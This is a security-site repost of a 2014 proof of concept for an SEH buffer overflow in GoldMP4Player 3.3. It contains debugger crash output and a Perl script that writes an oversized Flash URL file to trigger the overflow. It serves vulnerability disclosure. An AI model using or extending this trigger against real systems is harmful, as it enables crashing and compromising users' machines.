首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)
来源:vfocus.net 作者:Seljan 发布时间:2014-02-28  
#---------------------------------------------------------------------------------#
# Exploit Title: GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)                    #
# Date: Feb 25 2014                                                               #
# Exploit Author: Gabor Seljan                                                    #
# Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html #
# Version: 3.3                                                                    #
# Tested on: Windows XP SP3                                                       #
#---------------------------------------------------------------------------------#
  
# (cb4.cb0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=05506f41 ebx=00000111 ecx=05503ff1 edx=00130000 esi=05506fe0 edi=00000003
# eip=0041a0c3 esp=0012e25c ebp=054f4f88 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x1a0c3:
# 0041a0c3 8802            mov     byte ptr [edx],al          ds:0023:00130000=41
# 0:000> !exchain
# 0012e270: image00400000+4c1b3 (0044c1b3)
# 0012e3b0: image00400000+4c56a (0044c56a)
# 0012e430: image00400000+4c4ec (0044c4ec)
# 0012e4e0: *** ERROR: Symbol file could not be found.
# 0012e534: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e748: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e7a8: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e8cc: image00400000+4c333 (0044c333)
# 0012e9f4: <Unloaded_ION.dll>+41414140 (41414141)
# Invalid exception stack at 41414141
  
#!/usr/bin/perl
  
use strict;
use warnings;
  
my $filename = "poc.txt";
  
my $junk = "A" x 10000;
  
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE "http://$junk.swf";
close(FILE);
  
print "Exploit file created successfully [$filename]!\n";
print "Now open the URL in $filename via File -> Open Flash URL\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GoldMP4Player Buffer Overflow
·Music AlarmClock 2.1.0 - (.m3u
·GoAhead Web Server 3.1.x - Den
·VCDGEAR 3.50 Stack Buffer Over
·Symantec Endpoint Protection M
·Total Video Player 1.3.1 (Sett
·Python socket.recvfrom_into()
·GE Proficy CIMPLICITY gefebt.e
·Embedthis Goahead 3.1.3-0 Deni
·Kloxo Remote Root Exploit
·Python socket.recvfrom_into()
·Symantec Endpoint Protection M
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved